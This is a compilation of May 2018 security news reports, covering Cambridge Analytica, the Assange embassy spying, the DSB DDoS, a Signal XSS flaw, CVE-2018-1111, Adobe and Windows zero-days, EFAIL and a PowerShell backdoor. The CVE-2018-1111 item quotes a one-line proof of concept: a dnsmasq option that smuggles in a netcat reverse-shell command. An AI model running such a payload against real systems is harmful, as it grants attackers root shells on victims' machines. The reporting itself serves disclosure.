He added that he was aware of "black ops" at the company, "which I understood to include using hackers to break into computer systems to acquire kompromat or other intelligence for its clients."

He said that one of the tactics used to interfere with voter participation included "weaponizing fear."

"In one country, CA produced videos intended to suppress turnout by showing voters sadistic images of victims being burned alive, undergoing forced amputations with machetes and having their throats cut in a ditch," he said.

"These videos also conveyed Islamophobic messages. It was created with a clear intent to intimidate certain communities, catalyze religious hatred, portray Muslims as terrorists and deny certain voters of their democratic rights."

Cambridge Analytica announced earlier this month it was shutting down, unable to recover from the Facebook-linked scandal.

Its chief executive Alexander Nix was suspended after he was filmed by undercover reporters bragging about ways to win political campaigns, including through blackmail and honey traps.

Another whistleblower said that Britons' personal data may have been misused by a pro-Brexit campaign ahead of the 2016 referendum in which Britain voted to leave the European Union.


Auth0 Secures $55 Million in New Funding Round
16.5.2018 securityweek  Safety

Identity-as-a-Service (IDaaS) company Auth0 this week announced $55 million in Series D funding led by Sapphire Ventures.

To date, the Bellevue, Wash.-based identity management and authentication company has secured more than $110 million in financing. The firm offers a Universal Identity Platform for web, mobile, IoT, and internal applications and authenticates and secures more than 1.5 billion logins per month.

As part of the new financing round, the firm received investment from World Innovation Lab and existing investors Bessemer Venture Partners, Trinity Ventures, Meritech Capital, and K9 Ventures.

Auth0 plans on using the funds to continue innovation of its Universal Identity Platform, which the company says is used by companies such as VMware, AMD, Mazda, NVIDIA, News Corp, and thousands of others.

Founded in 2013, the company says it managed to double its overall customers and registered more than 100 percent revenue growth last year. This allowed it to hire 140 new employees and open additional offices in London, Sydney, and Tokyo.

“We are humbled by the support from our investors, and emboldened in our mission to provide the most extensible, powerful, and easy-to-use identity management solution available. We look forward to using these funds to make our product and company even better, and to continue offering value to our incredible customers around the world,” said Eugenio Pace, CEO and Co-founder of Auth0.

Last week, Auth0 announced it has joined the Decentralized Identity Foundation (DIF), an initiative from Microsoft, uPort, Gem, Evernym, Blockstack, and Tierion, focused on creating a standards-based ecosystem for managing digital identities. Together with IBM, Accenture, RSA, IDEO, and others, Auth0 will work on creating the specifications for securing and accessing identity data.

“Digital identity is the core of every interaction, transaction, and communication online, but it’s a little like the Wild West right now in terms of standards and specifications around how identity could be handled in a decentralized manner. There is an important need for strong voices to shape the future of this industry, and we are looking forward to our involvement with the Decentralized Identity Foundation,” Martin Gontovnikas, Vice President of Marketing at Auth0, said.


Operation Hotel – Ecuador spent millions on spy operation for Julian Assange
16.5.2018 securityaffairs BigBrothers

According to The Guardian newspaper, Ecuador spent millions on spy operation for Julian Assange after he hacked the embassy network.
According to a report published by the Guardian, Ecuador spied on WikiLeaks founder Julian Assange at its London embassy where he took in political asylum since 2012,

In 2012 a British judge ruled he should be extradited to Sweden to face allegations of sexual assault there, but Assange explained that they were political accusations.

“Ecuador bankrolled a multimillion-dollar spy operation to protect and support Julian Assange in its central London embassy, employing an international security company and undercover agents to monitor his visitors, embassy staff and even the British police, according to documents seen by the Guardian.” reads the report published by The Guardian.

“Over more than five years, Ecuador put at least $5m (£3.7m) into a secret intelligence budget that protected the WikiLeaks founder while he had visits from Nigel Farage, members of European nationalist groups and individuals linked to the Kremlin.”

The newspaper revealed Equador spent $5.0 million on the operation codenamed “Operation Guest” and later “Operation Hotel” that was approved by the then Ecuadorian president, Rafael Correa, and the then foreign minister, Ricardo Patiño.

Initially, the operation aimed at the Assange’s protection, but later became a spying operation on the journalist. From June 2012 to the end of August 2013, Operation Hotel cost Ecuador $972,889, according to documents belonging to the Senain, the Ecuadorian intelligence agency.

The experts hired by Equador monitored Assange’s daily activities and any contact with external staff and visitors, the stayed in a rented flat near the embassy at a cost of £2,800 a month.

Julian Assange

“Documents show the intelligence programme, called “Operation Guest”, which later became known as “Operation Hotel” – coupled with parallel covert actions – ran up an average cost of at least $66,000 a month for security, intelligence gathering and counter-intelligence to “protect” one of the world’s most high-profile fugitives.” continues the newspaper. the paper said.

According to The Guardian, that cited documents it has vieved, Assange hacked the communications system within the embassy gaining access to staff communications.

“In an extraordinary breach of diplomatic protocol, Assange managed to compromise the communications system within the embassy and had his own satellite internet access, according to documents and a source who wished to remain anonymous.” continues the paper

“By penetrating the embassy’s firewall, Assange was able to access and intercept the official and personal communications of staff,”

Wikileaks denied Assange had hacked the embassy network.

WikiLeaks

@wikileaks
No, @Guardian, @JulianAssange did not "hack into" embassy
satellites. That's an anonymous libel aligned with the current UK-US government onslaught against Mr. Assange's asylum--while he can't respond. You've gone too far this time. We're suing. https://www.newsweek.com/assange-how-guardian-milked-edward-snowdens-story-323480 …

8:19 PM - May 15, 2018
2,381
1,702 people are talking about this
Twitter Ads info and privacy
In response, Ecuador has forbidden internet access for Assange in recent months with the installation of a jammer, the Government as also restricted the number of visitors he can receive.

“Assange claims the accusations were politically motivated and could lead to him being extradited to the United States to face imprisonment over WikiLeaks’ publication of secret US military documents and diplomatic cables in 2010.” reported the AFP agency.

“Ecuador in December made Assange an Ecuadoran citizen and unsuccessfully tried to register him as a diplomat with immunity as part of its efforts to have him leave the embassy without risk of being detained.”

Last year, Sweden dropped its investigation on Assange, but the British authorities still plan to arrest him for breaching his bail conditions.


Massive DDoS attack hit the Danish state rail operator DSB
16.5.2018 securityaffairs
Attack

The Danish state rail operator DSB was hit by a massive DDoS cyber attack that paralyzed some operations, including ticketing systems and the communication infrastructure.
The Danish state rail operator DSB was hit by an unprecedented DDoS cyber attack, the attack was confirmed on Monday by the company and reported by The Local media outlet.

The attack was launched on Sunday and paralyzed the ticketing system and prevented passengers across the country from buying tickets.

“Tickets purchases via the company’s app, ticket machines, website and in 7-Eleven stores were all out of action due to the issue on Sunday.” reported The Local.

“Passengers with Rejsekort travel cards were able to use that system, while others purchased tickets from ticket inspectors on board trains.”

The state rail operator DSB restored normal operations on Monday morning

The company experts confirmed the attack from an external source with the specific intent to destroy the operations at the state rail operator DSB. The hackers took offline also internal mail system and the telephone infrastructure. The only way to communicate with the customers was represented by social media.

DSB

@omDSB
Der er i øjeblikket tekniske problemer med http://dsb.dk , salgskanaler, trafikinfo samt vores telefonlinjer. Vi arbejder på at løse fejlen.

7:04 PM - May 13, 2018
6
See DSB's other Tweets
Twitter Ads info and privacy

DSB

@omDSB
Vi er blevet gjort opmærksomme på, at andre fortsat oplever fejl, når de forsøger at komme på http://dsb.dk .

Det er blevet fejlmeldt og vi arbejder på sagen. https://twitter.com/omDSB/status/995879867022565378 …

7:28 AM - May 14, 2018
See DSB's other Tweets
Twitter Ads info and privacy
The train safety was not compromised by hackers, assured the deputy director.

“Our technicians and IT contractors have analysed this closely during the night and have concluded this is an outside attack in which someone has attempted to bring our system down,” DSB vice-director Aske Wieth-Knudsen said.

Danish state rail operator DSB

“”We have previously been subjected to an attack and, of course, we have made some processes to avoid this. The type of attack we saw yesterday is a new way of doing it, as we have not seen before. So it needs to be analyzed a bit closer, exactly what has happened so we can prevent it from repeating, says Aske Wieth-Knudsen.” Wieth-Knudsen told DR.

The company is investigating the issue along with Danish authorities and are monitoring the situation to prevent further attacks.

“At this moment in time I have not yet been in contact with anyone. We are still clarifying some messages, since the attack was only resolved during the night,” he told Ritzau.

“Now the day has started we will naturally contact relevant bodies,” he added.

Aske Wieth-Knudsen from DSB confirmed that the company has not been paid any kind of ransom in connection with the cyber assault.


Hackers shared technical details of a Code Injection flaw in Signal App
16.5.2018 securityaffairs
Vulnerebility

Researchers shared details of a code injection vulnerability they found in the in the Signal app for both Windows and Linux systems. The flaw was promptly fixed by Signal.
Signal has fixed a code injection vulnerability in the app for both Windows and Linux systems that was reported by a team of Argentinian experts.

A remote attacker could have exploited the flaw to inject a malicious code inside the Signal desktop app running on the recipients’ system without requiring any user interaction, just by sending the victims a specially crafted link.

The discovery of the flaw was casual, the white-hat hackers Iván Ariel Barrera Oro, Alfredo Ortega and Juliano Rizzo were chatting on Signal messenger when one of them shared a link of an XSS vulnerable Argentinian government website.

The experts noticed that the XSS payload was executed on the recipients’ Signal desktop app.

“we were chatting as usual and suddenly Alfredo shows us an XSS in an Argentinian government site (don’t worry, it’s been reported). He was using the Signal add-on for Chrome. Javier and I were using the desktop version, based on the insecure electron framework. As I was reading, something caught my attention: an icon was showing next to the URL, as a “picture not found” icon.” reads a blog post published by the experts.

Signal XSS flaw

“I jumped from my chair and warned: “your XSS is triggered in signal-desktop!!”.”

Signal xss flaw 2
The researchers focused their attention on XSS flaws in the Signal Messaging App and conducted other tests discovering that the vulnerabilities was affecting the function responsible for handling shared links.

The experts discovered that it is possible to exploit the flaw to inject user-defined HTML/JavaScript code via iFrame, image, video and audio tags.

“We tried different kinds of HTML elements: img, form, script, object, frame, framset, iframe, sound, video (this last two where funny).” continues the experts. “They all worked, except that CSP blocked the execution of scripts, which halted in some way this attack. However, to abuse this vuln, we could:

crash the app with repeated and specially crafted URLs, obtaining segmentation fault/DoS (Alfredo’s app crashed several times but mine didn’t, so we couldn’t reproduce it)
send a crafted image in base64 format (we didn’t carry on with this)
send a file/phish and execute it with <iframe src=”…”></iframe>
have fun with <img>, <audio> and <video> 🙂”
The attackers can also exploit the vulnerability to inject a form on the recipient’s chat window, tricking them to provide sensitive information via social engineering attacks.
The experts applauded the Signal security team that on Friday in under 2 hours from the report has fixed the issue.

Experts explained that the flaw did not allow attackers to execute system commands or gain sensitive information like decryption keys on the recipients’ system.

After Signal fixed the issue, the researcher analyzed the file’s history and discovered the patch leverages a regex function to validate URLs.
The applied “patch” already existed in the application, but was probably accidentally removed in a commit on April 10th to fix an issue with linking.
The experts are concerned about that regex and they are afraid someone might exploit it.
The Signal app continues to be the most secure choice for encrypted communication.


Dutch Government plans to phase out the use of Kaspersky solutions
16.5.2018 securityaffairs BigBrothers

Dutch Government plans to phase out the use of Kaspersky solutions while the security firm confirmed that its code infrastructure is going to move to Switzerland.
The antivirus firm Kaspersky Lab made the headlines again, the company confirmed that its code infrastructure is going to move to Switzerland. The news arrives just after the comment from the Netherlands government of the risks associated with the usage of Kaspersky Lab software.

Dutch government announced on Monday it plans to phase out the use of anti-virus software developed by Kaspersky Labs “as a precautionary measure” and recommending companies involved in the protection of critical infrastructure to do the same.

Dutch Government fear the aggressive Russian cyber strategy cyber that targets among others the country interests.

“In a letter to parliament, Justice Minister Ferdinand Grapperhaus said the decision was made because the Russian government had an “offensive cyber programme that targets among others the Netherlands and Dutch interests”.” reported The New York Times.

“He also said Moscow-based Kaspersky was subject to Russian laws that could oblige it to comply with Russian state interests.”

In response to the accusations from several governments, Kaspersky is moving a number of its core activities from Russia to Switzerland as part of its “Global Transparency Initiative.” It has been estimated that the overall costs of the transfer are $12m.

“The (Dutch) cabinet has carried out an independent review and analysis and made a careful decision on that basis,” Grapperhaus said. “Although there are no concrete cases of misuse known in the Netherlands, it cannot be excluded.”

Grapperhaus explained the Dutch government would consider revising the decision “if circumstances justify” doing so.


The U.S. DHS ban on the use of Kaspersky software by the U.S. Federal government in 2017, while Kaspersky continues to deny any cooperation with Russian intelligence,

Britain’s National Cyber Security Centre for agencies and organizations also suggests avoiding the usage of Kaspersky solutions for the protection of systems that manage classified information.

In December, Lithuania announced it will ban the products of the cybersecurity giant Kaspersky from computers in critical infrastructure.

In April, Twitter banned Kaspersky from advertising on its platform citing DHS ban for its alleged ties with Russian intelligence agencies.


Rail Europe North America hit by payment card data breach
16.5.2018 securityaffairs Incindent

Rail Europe North America (RENA) notifies customers of a security breach, crooks compromised its website with a malware used to siphon payment card data.
The website allows users to buy European train tickets, according to the company the data breach lasted at least three months (between November 29, 2017 and February 16, 2018), the incident exposed also customers’ payment card data.

“Rail Europe North America Inc. (“RENA” or “we”) is writing to let you, as a customer of RENA, know about a recent data security incident that may have involved your credit card or debit card information and other personal information” reads the notice sent by the company to its customers.

“On February 16, 2018, as a result of a query from one of our banks, we discovered that beginning on November 29, 2017, through February 16, 2018, unauthorized persons gained unauthorized access to our ecommerce websites’ IT platform. Upon discovery that this malicious intrusion may have compromised users’ personal information, we immediately cut off from the Internet all compromised servers on February 16, 2018, and engaged information security experts to assist with forensic analysis, system restoration and security hardening”

According to the notice of data breach, hackers accessed registered users’ personal information including name, gender, delivery address, invoicing address, telephone number, email address, credit/debit card number, expiration date and CVV of customers, and, in some cases, username and password.

Rail Europe North America hack

The security breach was discovered after a bank inquiry informed the organization of an attack.

“In this case, however, the hackers were able to affect the front end of the Rail Europe website with ‘skimming’ malware, meaning customers gave payment and other information directly to the hackers through the website,” said Comparitech privacy advocate Paul Bischoff. “While the details haven’t been fully disclosed, the fact that this went on for three months shows a clear lack of security by Rail Europe.”

RENA replaced and rebuilt all compromised systems from known safe code, it also removed any potentially untrusted components. The IT staff changed passwords on all systems and applications, improved security controls and renewed digital certificates.

“RENA has also provided notice to the credit card brands and our credit/debit card transaction processors.” continues the notice.
“In addition, we are offering identity theft protection services through ID Experts®, the data breach and recovery services expert, to provide you with MyIDCare™. MyIDCare services include: 12 months of Credit and CyberScan monitoring, a $1,000,000 insurance reimbursement policy, exclusive educational materials and fully managed id theft recovery services.”


Anonymous defaced Russia govt website against Telegram ban
16.5.2018 securityaffairs BigBrothers

Anonymous collective hacked and defaced the subdomain of the Russia’s Federal Agency for International Cooperation (Rossotrudnichestvo) site to protest against the government censorship, with a specific reference to the ban on Telegram.
Anonymous hacked the official website of Russia’s Federal Agency for International Cooperation (Rossotrudnichestvo), the cyber attack occurred on May 10th (Rossotrudnichestvo). The popular collective hacked and defaced the subdomain of the site to protest against the government censorship, with a specific reference to the ban on Telegram. Last month, the Russian authorities blocked the Telegram app in the country because the company refused to hand over encryption keys of its users to Federal Security Service (FSB) of Russia for investigation purposes.

“The website of a government agency tasked with promoting Russia’s image abroad has been hijacked by hackers who posted a message with a threat against the state body involved in a campaign to block a popular messaging app.” reads The Moscow Times.

Since May 3rd, 2018, Russia’s media and communication regularity authority Roskomnadzor blocked over 50 virtual private networks (VPNs), Web Proxies and Anonymizing networks.

Anonymous defaced one of the subdomains of Rossotrudnichestvo, the hackers published the NSFW image and several messages against the ongoing government censorship.

“Greetings, Roskomnadzor. Your recent destructive actions against Runet led us to the idea that you are just a handful of incompetent brainless worms. You no longer have to be able to continue this pointless vandalism. Consider this as our last warning. Yours, Anonymous.” reads the message published on the defaced domain.

Anonymous hack Russia Website
Source: Hackread.com

“That defacement was accompanied by the image of a cartoon character wearing a Roskomnadzor arm patch using a flamethrower on the “internet,” as well as a symbol of Telegram founder Pavel Durov’s “Digital Resistance” which he declared against political censorship.” continues the media outlet.

Currently, the Rossotrudnichestvo website is up and active, while the defaced subdomain prev.rs.gov.ru was offline.


Red Hat Linux DHCP Client affected by a command injection flaw, patch it now!
16.5.2018 securityaffairs
Vulnerebility

Red Hat has announced a critical vulnerability in its DHCP client tracked as CVE-2018-1111 that could be exploited by attackers to execute arbitrary commands with root privileges on targeted systems.
Felix Wilhelm from the Google security team discovered a critical remote command injection vulnerability in the DHCP client implementation of Red Hat Linux, the issue also affects other distros based on it like Fedora.

The vulnerability, tracked as CVE-2018-1111, could be exploited by attackers to execute arbitrary commands with root privileges on targeted systems.

Felix Wilhelm
@_fel1x
CVE 2018-1111 is a pretty bad DHCP remote root command injection affecting Red Hat derivates: https://access.redhat.com/security/vulnerabilities/3442151 …. Exploit fits in a tweet so you should patch as soon as possible.

3:54 PM - May 15, 2018
450
474 people are talking about this
Twitter Ads info and privacy
“Red Hat has been made aware of a command injection flaw found in a script included in the DHCP client (dhclient) packages in Red Hat Enterprise Linux 6 and 7.” reads the security advisory published by Red Hat.

“A malicious DHCP server, or an attacker on the local network able to spoof DHCP responses, could use this flaw to execute arbitrary commands with root privileges on systems using NetworkManager which is configured to obtain network configuration using the DHCP protocol.”

The DHCP client application receives network configuration parameters, including IP address and DNS servers, from the DHCP (Dynamic Host Control Protocol) server.

The CVE-2018-1111 command injection flaw resides in the NetworkManager integration script of the DHCP client packages in Red Hat Enterprise Linux.

The researcher Barkın Kılıç published a PoC for the CVE-2018-1111, in the last screenshot the attacker accesses the shell as root.

Red Hat DHCP client flaw

Barkın Kılıç
@Barknkilic
#CVE-2018-1111 tweetable PoC :) dnsmasq --interface=eth0 --bind-interfaces --except-interface=lo --dhcp-range=10.1.1.1,10.1.1.10,1h --conf-file=/dev/null --dhcp-option=6,10.1.1.1 --dhcp-option=3,10.1.1.1 --dhcp-option="252,x'&nc -e /bin/bash 10.1.1.1 1337 #" cc: @cnbrkbolat

9:21 PM - May 15, 2018
824
661 people are talking about this
Twitter Ads info and privacy
Wilhelm did not release a PoC exploit code, but he explained that is so short in length that it even can fit in a tweet.

According to Wilhelm, an attacker using a malicious DHCP server, or connected to the same network as the victim, can exploit this vulnerability by spoofing DHCP responses, eventually allowing them to run arbitrary commands with root privileges on the victim’s system running vulnerable DHCP client.

The vulnerability affects Red Hat Enterprise Linux 6 and 7, admins should update their packages to the newer versions as soon as they are available.

“Users have the option to remove or disable the vulnerable script, but this will prevent certain configuration parameters provided by the DHCP server from being configured on a local system, such as addresses of the local NTP or NIS servers,” Red Hat warns.

Below the full list of affected RHEL versions:

Advanced Update Support 6.4; Extended Update Support 7.3; Advanced Update Support 6.6; Red Hat Enterprise Linux 6; Extended Update Support 6.7; Advanced Update Support 7.2; Server TUS (v.6.6); RHEL 7; Extended Update Support 7.4; Virtualization 4 Management Agent for RHEL 7 Hosts; Advanced Update Support 6.5; and Linux Server TUS (v. 7.2).

Red Hat’s update services for SAP Solutions on x86 and IBM Power architectures are also affected.

Fedora has already released new versions of DHCP packages containing fixes for Fedora 26, 27, and 28.

Other Linux distros like OpenSUSE and Ubuntu are not affected by the vulnerability because their DHCP client implementation doesn’t include NetworkManager integration script by default.


Mysterious hackers ingenuously reveal two Zero-Days to security community
16.5.2018 securityaffairs
Vulnerebility

Mysterious hackers ingenuously reveal two zero-days to the security community, experts collaborated to promptly fix them.
Anton Cherepanov, security expert form ESET researcher, discovered two zero-days while analyzing a malicious PDF, according to the researcher the mysterious hacker(s) were still working on the exploits.

The malicious PDF was discovered late in March 2018 (Two suspicious PDF samples zero-day 1, zero-day 2), the analysis of the document revealed it was exploiting two previously unknown vulnerabilities, a remote-code execution vulnerability in Adobe Reader and a Windows privilege escalation flaw.

“The use of the combined vulnerabilities is extremely powerful, as it allows an attacker to execute arbitrary code with the highest possible privileges on the vulnerable target, and with only the most minimal of user interaction. APT groups regularly use such combinations to perform their attacks, such as in the Sednit campaign from last year.” reads the analysis published by ESET.

“The sample does not contain a final payload, which may suggest that it was caught during its early development stages,” Cherepanov said.

ESET shared its discovery with the Microsoft Security Response Center, Windows Defender ATP research team, and Adobe Product Security Incident Response Team as they fixed these bugs.

The two zero-days were tracked as CVE-2018-4990, that affected Adobe Acrobat/Reader PDF viewer, and as CVE-2018-8120 that affected the Win32k component of Windows.

By chaining the two vulnerabilities it was possible to escape the Adobe’s sandbox protection and execute arbitrary code inside Adobe Acrobat/Reader.

“The malicious PDF sample embeds JavaScript code that controls the whole exploitation process. Once the PDF file is opened, the JavaScript code is executed,” states the report published by ESET.

Below the steps composing the attack chain:

The victim receives and opens a weaponized PDF file
Once the user opened the PDF, a malicious JavaScript code will execute.
JavaScript code manipulates a button object
The Button object contains a specially-crafted JPEG2000 image, triggers a double-free vulnerability in Adobe Acrobat/Reader.
JavaScript code uses heap-spray techniques to obtain read and write memory access
JavaScript code then interacts with Adobe Reader’s JavaScript engine
The attacker uses the engine’s native assembly instructions (ROP gadgets) to execute its own native shellcode.
Shellcode initializes a PE file embedded in the PDF
Once the attacker has exploited the Adobe Reader vulnerability, he will leverage the Window zero-day flaw to escape the sandbox. The Microsoft Win32k zero-day allows the attacker to elevate the privilege of the PE file to run, which is run in kernel mode, escaping the Adobe Acrobat/Reader sandbox and gaining system-level access.
Even if the chain of the zero-days could be very dangerous, the developers allowed the security community to detect them by uploading it to a known virus scanning engine aiming to test its evasion capability.

zero-days exploits

The two zero-days have been already patched, Microsoft addressed the CVE-2018-8120 with the release of the May 2018 Patch Tuesday, Adobe patched the CVE-2018-4990 this week.
“Initially, ESET researchers discovered the PDF sample when it was uploaded to a public repository of malicious samples. The sample does not contain a final payload, which may suggest that it was caught during its early development stages.” concludes the report.
“Even though the sample does not contain a real malicious final payload, which may suggest that it was caught during its early development stages, the author(s) demonstrated a high level of skills in vulnerability discovery and exploit writing.”


Symantec Shares More Information on Internal Investigation
15.5.2018 securityweek  IT

Symantec shares gained nearly 10 percent on Monday in anticipation of a conference call that promised to provide more information regarding the internal investigation announced by the company last week.

Along with its financial results for the fourth quarter and full year, Symantec told investors last week that the Audit Committee of the Board of Directors had launched an investigation as a result of concerns raised by a former employee.

The company initially did not share any additional information, except that the Securities and Exchange Commission (SEC) had been notified and that the probe would likely prevent it from filing its annual 10-K report with the SEC in a timely manner.

Symantec shares dropped roughly 20 percent to less than $24 after the announcement was made on Thursday, and on Friday shares dove 33 percent, reaching just over $19.

A conference call announced for Monday afternoon helped the company gain nearly 10 percent, closing at $21.40.

While many expected Symantec to provide details on its internal probe, the company did not answer any questions on the matter. A statement published by the company does, however, reveal that the investigation is related to “concerns raised by a former employee regarding the Company’s public disclosures including commentary on historical financial results, its reporting of certain Non-GAAP measures including those that could impact executive compensation programs, certain forward-looking statements, stock trading plans and retaliation.”

The company says it cannot predict the duration of the investigation or the outcome, which could have an impact on financial results and guidance.

The cybersecurity firm says it does not anticipate a material adverse impact on its historical financial statements.

In response to news of the internal probe, investor rights law firm Rosen Law Firm announced the preparation of a class action to recover losses suffered by Symantec investors. Rosen says it’s investigating allegations that Symantec “may have issued materially misleading business information to the investing public.”


Adobe Patches Two Dozen Critical Flaws in Acrobat, Reader
14.5.2018 securityweek
Vulnerebility

Updates released on Monday by Adobe for its Acrobat, Reader and Photoshop products patch nearly 50 vulnerabilities, including critical flaws that allow arbitrary code execution.

A total of 47 security holes have been addressed in the Windows and macOS versions of Acrobat DC (Consumer and Classic 2015), Acrobat Reader DC (Consumer and Classic 2015), Acrobat 2017, and Acrobat Reader 2017. The flaws have been resolved with the release of versions 2018.011.20040, 2017.011.30080 and 2015.006.30418.

The vulnerabilities include 24 critical memory corruptions that allow arbitrary code execution in the context of the targeted user, and various types of “important” issues that can lead to information disclosure or security bypasses.

Independent experts and researchers from Cisco Talos, ESET, Kaspersky, Check Point, Palo Alto Networks, Tencent, Knownsec 404 Security Team, Cybellum and Cure53 have been credited for responsibly disclosing the flaws patched with the latest Acrobat and Reader releases. Many of the security bugs were reported to Adobe through Trend Micro’s Zero Day Initiative (ZDI).

Adobe also informed customers that support for Acrobat and Reader 11.x ended on October 15, 2017, and that version 11.0.23 is the final release for these branches. Users have been advised to update to the latest versions of Acrobat DC and Acrobat Reader DC.

Adobe has also released security updates for the Windows and macOS versions of Photoshop CC to address a flaw reported by researcher Giwan Go.

Photoshop CC 2018 version 19.1.4 and Photoshop CC 2017 version 18.1.4 fix a critical out-of-bounds write issue that can be exploited for arbitrary code execution in the context of the targeted user.

Earlier this month, Adobe patched several vulnerabilities in its Flash Player, Creative Cloud and Connect products with the company’s Patch Tuesday updates.

The previous round of security updates for Acrobat and Reader resolved 39 vulnerabilities. However, those updates had been assigned a priority rating of “2,” which makes them less likely to be exploited, while the latest patches have been given a priority rating of “1,” which means exploitation is more likely and users should update as soon as possible.


Emails Encrypted With OpenPGP, S/MIME Vulnerable to New Attacks
14.5.2018 securityweek
Attack  

Researchers from three universities in Germany and Belgium say they have discovered attack methods that can be used by malicious actors to read emails encrypted with OpenPGP and S/MIME, but some believe the claims are overblown.

The team of researchers who discovered the attacks were initially planning on disclosing details on Tuesday morning, but they later decided to make their findings public sooner as a result of speculation and third parties leaking information.

OpenPGP is an encryption standard that is often used by individuals and organizations to protect emails and other types of communications against eavesdropping. S/MIME (Secure/Multipurpose Internet Mail Extensions) is a standard that is more commonly used to secure email in enterprise environments.

According to researchers, there are some vulnerabilities in OpenPGP and S/MIME that can be exploited to exfiltrate plain text from encrypted emails, including messages sent by the targeted user in the past.EFAIL attack on PGP and S/MIME

There are two variations of this attack, which experts have dubbed EFAIL. Both require the attacker to be able to intercept encrypted emails, either via man-in-the-middle (MitM) attacks, by hacking email accounts, or through compromised SMTP servers. The attacker then manipulates the ciphertext in the harvested emails and sends a modified message containing custom HTML code to the original receiver or sender.

The first method, which involves direct exfiltration, leverages vulnerabilities in the Apple Mail (for iOS and macOS) and Mozilla Thunderbird email clients. In this attack, the hacker sends the targeted user a specially crafted multipart email with three HTML body parts. When the victim’s client opens and decrypts the email, the attacker’s code causes the application to send the text to the attacker’s server.

The second method, named a CBC/CFB gadget attack, abuses vulnerabilities in the OpenPGP (CVE-2017-17688) and S/MIME (CVE-2017-17689) specifications. In both cases the victim needs to be in possession of their private key – the method cannot be used to recover encrypted messages if the private key has been lost.

“Once [the victim] opens the email in his client, the manipulated ciphertext will be decrypted – first the private key of the victim is used to decrypt the session key s, and then this session key is used to decrypt the manipulated ciphertext c. The decrypted plaintext now contains, due to the manipulations, an exfiltration channel (e.g., an HTML hyperlink) that will send the decrypted plaintext as a whole or in parts to the attacker,” researchers wrote in their paper on EFAIL.

Experts say the direct exfiltration technique is efficient against both PGP and S/MIME, while the second method works against PGP with a success rate of one in three attempts. On the other hand, the CBC/CFB gadget attacks could become more efficient against PGP as well once more research is conducted.

The EFAIL attack is said to work against 25 of 35 tested S/MIME email clients and 10 of 28 tested OpenPGP clients.

Just as the researchers announced their intention to disclose the details of these vulnerabilities, the EFF published a blog post telling users to “immediately disable and/or uninstall tools that automatically decrypt PGP-encrypted email” and use alternatives, such as Signal, for secure communications.

However, some members of the industry believe the EFF’s alert and the researchers’ claims are overblown, noting that EFAIL attacks are actually possible due to how email clients implement PGP and they can be mitigated by not using HTML for incoming emails.

Cryptography expert Matthew Green believes EFAIL poses a bigger risk to enterprises that use S/MIME, describing the attack on this standard as “straightforward.”

Expert comments on EFAIL attack

Medium-term mitigations proposed by the researchers who discovered EFAIL involve patches released by email client developers, but they believe the mitigations implemented by each vendor “may or may not prevent the attacks.” As for long-term mitigations, they believe changes will need to be made to the OpenPGP and S/MIME standards themselves.


New PowerShell Backdoor Discovered
14.5.2018 securityweek
Virus

A recently detected PowerShell backdoor can steal information and execute various commands on the infected machines.

Dubbed PRB-Backdoor, the malware has been distributed via a Word document containing malicious macros. The document was named “Egyptairplus.doc” and was initially believed to deliver malware linked to the MuddyWater campaigns targeting the Middle East.

Analysis of the document’s macro revealed a function called Worker(), designed to call multiple other functions embedded in the document, to ultimately run a PowerShell command.

The command would look within the document for a chunk of embedded data that is Base64 encoded and decodes it, the security researcher behind Security 0wnage explains. This eventually results in an obfuscated PowerShell script.

“Replacing iex with Write-Output and running this code will result in a second layer PowerShell script that is shown earlier in the blog and has similarities with MuddyWater code due to the use of the Character Substitution functions,” the security researcher notes.

Replacing all the iex with Write-Output reveals more readable code that still contains encoded chunks of data. Further analysis of the code revealed an Invoker.ps1 script designed to decrypt the main backdoor code.

The backdoor contains over 2000 lines of code when properly formatted. Because of the main function is named PRB, the researcher decided to call the malware PRB-Backdoor.

Although execution of the sample in a sandbox did not reveal network communication, the code does include a variable that appears to point to the main domain that the backdoor communicates with to retrieve commands, namely outl00k[.]net.

The researcher discovered that the email address used to register the domain was also used for the domain LinLedin[.]net. The researcher also found the IPs the two domains were resolving to, but no additional information on either of them was discovered.

Looking into the PRB-Backdoor code, the security researcher found functions supposedly related to initial communication and registration with the command and control (C&C) server, along with a function designed to retrieve the browsing history from different browsers, including Chrome, Internet Explorer, and Firefox.

Other functions revealed the backdoor’s ability to steal passwords, write files to disk, read files, update itself, launch a shell, log keystrokes, take a screenshot of the screen, get the system info, and more.

“The PRB-Backdoor seems to be a very interesting piece of malware that is aimed to run on the victim machine and gather information, steal passwords, log keystrokes and perform many other functions. I could not find any reference to the backdoor or its code in any public source,” the researcher notes.


Facebook Suspends 200 Apps Over Data Misuse
14.5.2018 securityweek
Social

Facebook said Monday it has suspended "around 200" apps on its platform as part of an investigation into misuse of private user data.

The investigation was launched after revelations that political consulting firm Cambridge Analytica hijacked data on some 87 million Facebook users as it worked on Donald Trump's 2016 campaign.

"The investigation process is in full swing," said an online statement from Facebook product partnerships vice president Ime Archibong.

"We have large teams of internal and external experts working hard to investigate these apps as quickly as possible. To date thousands of apps have been investigated and around 200 have been suspended -- pending a thorough investigation into whether they did in fact misuse any data."

Archibong added that "where we find evidence that these or other apps did misuse data, we will ban them and notify people via this website."

The revelations over Cambridge Analytica have prompted investigations on both sides of the Atlantic and led Facebook to tighten its policies on how personal data is shared and accessed.

Facebook made a policy change in 2014 limiting access to user data but noted that some applications still had data it had obtained prior to the revision.

"There is a lot more work to be done to find all the apps that may have misused people's Facebook data -- and it will take time," Archibong said.


Behind the Scenes in the Deceptive App Wars
14.5.2018 securityweek IT

All is not well in the app ecosphere. That ecosphere comprises a large number of useful apps that benefit users, and an unknown number of apps that deceive users. The latter are sometimes described potentially unwanted programs, or PUPs. Both categories need to make money: good apps are upfront with how this is achieved; deceptive apps hide the process.

In recent years there has been an increasing effort to cleanse the ecosphere of deceptive apps. The anti-virus (AV) industry has taken a more aggressive stance in flagging and sometimes removing what it calls PUPs; the Clean Software Alliance (CSA) was founded to help guide app developers away from the dark side; and a new firm, AppEsteem, certifies good apps and calls out bad apps in its ‘Deceptor’ program.

One name figures throughout: Dennis Batchelder. He is currently president of the AV-dominated Anti-Malware Testing Standards Organization (AMTSO); was a leading light in the formation, and until recently a member of the advisory board, of the CSA; and is the founder of AppEsteem.

But there has been a falling out between the CSA and AppEsteem.

The CSA
The CSA was officially launched in the Fall of 2015, although it had already been on the drawing board for over a year. Batchelder was instrumental in getting it started while he was working for Microsoft, where he was director, program management until April 2016.

The CSA was introduced during VB2015 with a joint presentation from Microsoft and Google, demonstrating early support from the industry’s big-hitters.

